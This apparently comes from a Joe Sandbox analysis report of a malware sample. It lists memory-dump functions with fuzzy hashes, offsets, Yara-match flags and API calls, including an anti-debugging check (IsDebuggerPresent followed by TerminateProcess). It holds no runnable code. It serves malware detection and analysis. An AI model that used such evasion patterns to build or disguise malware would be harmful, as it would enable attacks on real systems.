                                                    • Instruction ID: 82892741a5ad82a89bbd9b48603f09960b2b124f9482ae123938a47aa4356535
                                                    • Opcode Fuzzy Hash: 2057e2ba7dc217fe8729ac091278c0b4a2c0d0dc2bb38f408116b6b1fb6282e5
                                                    • Instruction Fuzzy Hash: 38C08C3028030847DBD42AE06D1D7AB3BAEDB60285B080094E30A82180FE0A980089B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ba6e21a00fa41a7ba1af3507c9160fabd16559d7e27826fc2dd3e5dde6c409e
                                                    • Instruction ID: 66e45200f9db5584c650f8192b602a93410811359bfcb6a59242eccacf6b02fe
                                                    • Opcode Fuzzy Hash: 5ba6e21a00fa41a7ba1af3507c9160fabd16559d7e27826fc2dd3e5dde6c409e
                                                    • Instruction Fuzzy Hash: 95D0C73145060DDFCB01AF94D94489D7F75FF49300F408519F54516111EB31E575DBD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19214dbb6bcff290f33f67661d5bb6fa12d03105e03523bd8f25644874ec3b8c
                                                    • Instruction ID: 56e54b3801de0c2c7b55704cde9cd51805c31cbbb883ec54d57cae4ebc8f74a3
                                                    • Opcode Fuzzy Hash: 19214dbb6bcff290f33f67661d5bb6fa12d03105e03523bd8f25644874ec3b8c
                                                    • Instruction Fuzzy Hash: A9C08C7710D2E04FC7028B60CC60A427BB24A2B3D238A00C2E082CF293D10A89048F73
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60ac39ce0adfc68f1a21fe72ffeade1d0d9468d12558c1fee7d22bcae60dd10f
                                                    • Instruction ID: 3f2553325c642b8bd4a0bfdf3eea36ba101b028057cbebf321f39542f5f13cf4
                                                    • Opcode Fuzzy Hash: 60ac39ce0adfc68f1a21fe72ffeade1d0d9468d12558c1fee7d22bcae60dd10f
                                                    • Instruction Fuzzy Hash: C2D09236A400098BCB08DF94E5548DCFB36EF88222F049261D609621148B356E96CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9907ae23f48d37f26d0fe964247702b20576e7ef7158dfec21b3a4cf1787696
                                                    • Instruction ID: cf32c4aa8cb316bc285f0a858f4f0fecc6a7197979042330b9b4bbdcf2d6a92f
                                                    • Opcode Fuzzy Hash: a9907ae23f48d37f26d0fe964247702b20576e7ef7158dfec21b3a4cf1787696
                                                    • Instruction Fuzzy Hash: ADD022E02E80A0DFE7035B22C8068173FA3CB823C0F004086E2E08B2D2C72988088A00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e446decae95b90a7e17ad335a021529dd4ac7170d70410b2feae87d06faabaf7
                                                    • Instruction ID: 58f6966d0c8f725bcaa56d415f4004e38510b462b38a4495fd94a204300cf99f
                                                    • Opcode Fuzzy Hash: e446decae95b90a7e17ad335a021529dd4ac7170d70410b2feae87d06faabaf7
                                                    • Instruction Fuzzy Hash: B4C04C317947084BEFD41AE1791832B77ADD790695B4801A5E70DC5580EE5A9810D551
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278147289.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cb79434e6fc0b25735c656b80a9bc5807fbfb52bee9de48ae40c5f6338085512
                                                    • Instruction ID: 8d32d44da01f99bfa2fa7d8da4a2f029fbf44967441da6caacd34aad8f37af87
                                                    • Opcode Fuzzy Hash: cb79434e6fc0b25735c656b80a9bc5807fbfb52bee9de48ae40c5f6338085512
                                                    • Instruction Fuzzy Hash: 70C08C32608380CBCB4AA33054091C63F926BA3306F19ADBDC08A09003817B001AEBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86b2b5adf033c9873b55e2ed78b77a77478e8f74023c0c8d0ccf110104b2b6ad
                                                    • Instruction ID: 8dedc3ff2df9f90f27c6a279b944147a342a91cdfbd6a8374035e72047bc4d51
                                                    • Opcode Fuzzy Hash: 86b2b5adf033c9873b55e2ed78b77a77478e8f74023c0c8d0ccf110104b2b6ad
                                                    • Instruction Fuzzy Hash: 14C0123145070C8EC700BA68D454859BBB8AB15200B405119E44516111EB30A5E9CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 438e0d33f1383aee32e464a6e486eaf653224f00d6da6b992829b2b89c790441
                                                    • Instruction ID: 4f69f7f584c3f5d7046ad49d4e28579eba14ec3f3b4c3deaffa32ab580aa94be
                                                    • Opcode Fuzzy Hash: 438e0d33f1383aee32e464a6e486eaf653224f00d6da6b992829b2b89c790441
                                                    • Instruction Fuzzy Hash: 5DC0123145070C8EC700BA68D4544597BB8BB15300B004519D44566100FB20B1A9CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b0fc4229dae415c6659bf3e5e79ce8d5a923dab4009e1ba0131b2e03a95d5f56
                                                    • Instruction ID: fd4a5ca3f568619cb99899fc4e07b7850f338318d33af7559f14294a8554c1a9
                                                    • Opcode Fuzzy Hash: b0fc4229dae415c6659bf3e5e79ce8d5a923dab4009e1ba0131b2e03a95d5f56
                                                    • Instruction Fuzzy Hash: 3FC04C39740009CFCB00DB99E5448DCB7F0EF8822AB1140E5E60997631C731AD55CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff3b8ecf88ffcd5a80d99eeed5bd39ec48d46bacf845807df498d0e8db4476b9
                                                    • Instruction ID: 8466fb5145fdad1954b20e3cfd1e2fea93a3f2e24f74a7b4d9889095c1c47921
                                                    • Opcode Fuzzy Hash: ff3b8ecf88ffcd5a80d99eeed5bd39ec48d46bacf845807df498d0e8db4476b9
                                                    • Instruction Fuzzy Hash: 9EB09236A0000889EB409A84A1043EDBB20E790222F004427C60462040C3B1036897A2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                    • Instruction ID: 8d85851c5b44cdcf210d904aa31d3daf7cc236b6462a18c19cd7dabf7ccbd14b
                                                    • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                    • Instruction Fuzzy Hash: F9B01236A40008C9EF10CBD5F0043EDB770E78023AF000067C60C624408370036446E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                    • Instruction ID: 8d85851c5b44cdcf210d904aa31d3daf7cc236b6462a18c19cd7dabf7ccbd14b
                                                    • Opcode Fuzzy Hash: 93cf7a4db9210b18d809a595f7e0e06169023cd54791106101c81ebba94ba4fd
                                                    • Instruction Fuzzy Hash: F9B01236A40008C9EF10CBD5F0043EDB770E78023AF000067C60C624408370036446E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277967120.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6060000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6e84aeb1a64f43fc636e3a3596e02b7bd43ed4bab4a42625f5adf8889a385b5
                                                    • Instruction ID: 751da29e5b2e3bf553ccd36360cc78a86ed538de172116a383e7ac48b35096d3
                                                    • Opcode Fuzzy Hash: a6e84aeb1a64f43fc636e3a3596e02b7bd43ed4bab4a42625f5adf8889a385b5
                                                    • Instruction Fuzzy Hash: BEB012B18411856FDF108B30E4068D07F9199103103144440D1C140600E71000C0CB51
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32 ref: 00623944
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00623959
                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00623964
                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00623980
                                                    • TerminateProcess.KERNEL32(00000000), ref: 00623987
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                    • String ID:
                                                    • API String ID: 2579439406-0
                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                    • Instruction ID: 2e2a3055214de3c9ff05e7f1c4b0902eee844860a829bcddad9c99d034e2b277
                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                    • Instruction Fuzzy Hash: 6A21D2B8A01204EFD720DF65F94A6457FB0FB08756F80407AE50887762E7B8A682CF5D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278069850.00000000060A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_60a0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45^q
                                                    • API String ID: 0-2140645089
                                                    • Opcode ID: b9cbe0ed556b472de13b232e107fcaa198d3eb0b1722e7fe398a766ab340ab43
                                                    • Instruction ID: b12a34292b118c144df955f65a345cb6189327458b90c896c50b81f7673911cd
                                                    • Opcode Fuzzy Hash: b9cbe0ed556b472de13b232e107fcaa198d3eb0b1722e7fe398a766ab340ab43
                                                    • Instruction Fuzzy Hash: C1A32A31E90B1A96EB209B60CC91BD9F371BF95700F60C746A6583B5C1EBB47AC5CB90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$PA
                                                    • API String ID: 0-3039612711
                                                    • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                    • Instruction ID: aa842413f2dc7e24781ba40b634f28a7787ee20a741cb05bd9726e7a550c4cd7
                                                    • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                    • Instruction Fuzzy Hash: 4DE19C316083418FC724DF28C0946EAB7E2FFD9354F18492DE88987351E775D98ACB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                    • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                    • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                    • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3274741143.00000000021D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_21d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: 6af2c052d38e725148abef718f2abb259f50e0870b03da673ba72caca79302d9
                                                    • Instruction ID: 464b4d211aa84d1fca8b8980a7848e9625fe12015066a7dc3449292bb1eec7d8
                                                    • Opcode Fuzzy Hash: 6af2c052d38e725148abef718f2abb259f50e0870b03da673ba72caca79302d9
                                                    • Instruction Fuzzy Hash: 3F713A70E44208CFEB0CEF7AE94169ABBE3BF85304B14D969D1159F269EBB45806CF41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3274741143.00000000021D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_21d0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: 5bd6e44475005e80f5326389db6fe7be0ce720f93b48f8951146e8ac6cc6392d
                                                    • Instruction ID: 60bfd1b938dcc4983c5c84aeeffad10db28c502b43daf2971a90d4934d3946df
                                                    • Opcode Fuzzy Hash: 5bd6e44475005e80f5326389db6fe7be0ce720f93b48f8951146e8ac6cc6392d
                                                    • Instruction Fuzzy Hash: C0714870E40208CFEB0CEF7AE94169ABBE3BF89304B14D869C1159F269EBB45805CF41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GetProcAddress.$l
                                                    • API String ID: 0-1376745856
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: d432b143ed17685341431273a84ae89e5980c1c75ba790a46a902e3994a5e5ca
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: 5D313CB6900609DFEB10CF99C880AEDBBF6FF48324F19544AD441A7311D7B1EA85CBA4
                                                    APIs
                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5fd0000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq
                                                    • API String ID: 0-725504367
                                                    • Opcode ID: baf606c052fab0683b0580edd7fe1a0b20ded0ea97d672860b1f5f119bcb60cd
                                                    • Instruction ID: e9095b9ea19715960a7ec0e28ca9528e0d5aa23c7b1d2ef46115b8f8d2ae705d
                                                    • Opcode Fuzzy Hash: baf606c052fab0683b0580edd7fe1a0b20ded0ea97d672860b1f5f119bcb60cd
                                                    • Instruction Fuzzy Hash: 88D19E34B002158FC704DFB9D594A6EBBF6AF89340B1584A9E905DB365DF74DC02CBA1
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                    • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                    • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                    • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(004123AF), ref: 00622646
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                    • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                    • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                    • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                    • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                    • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                    • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_610000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6499a25ff7447b389fc8d0f35bfc94d9811db0526d6ca037196e46e3719a58a5
                                                    • Instruction ID: 61d83397074ed2bee54176b0933566188f1ef79ff8c195164d2f2b9954bfd7d4
                                                    • Opcode Fuzzy Hash: 6499a25ff7447b389fc8d0f35bfc94d9811db0526d6ca037196e46e3719a58a5
                                                    • Instruction Fuzzy Hash: BF5273716047169FC708CF29C8906F9B7E2FB88304F184A2DE896D7B80DB35E995CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.3271943549.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.3271943549.0000000000439000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                    • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                    • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                    • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3278219024.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6100000_FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e67fb01b8d130045a2edcdfa62c85710ca18f039ddf3487701d10b4df33a93b9
                                                    • Instruction ID: 5db550a3a151ee544325cca216a595c62d7c505e311ee45b26f707bcadc106de
                                                    • Opcode Fuzzy Hash: e67fb01b8d130045a2edcdfa62c85710ca18f039ddf3487701d10b4df33a93b9
                                                    • Instruction Fuzzy Hash: 5032F831E50B5AA5EB21DB60CC81BC5F371BF9A700F60DA46F6583A5C0EBB076D58B90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3277864225.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
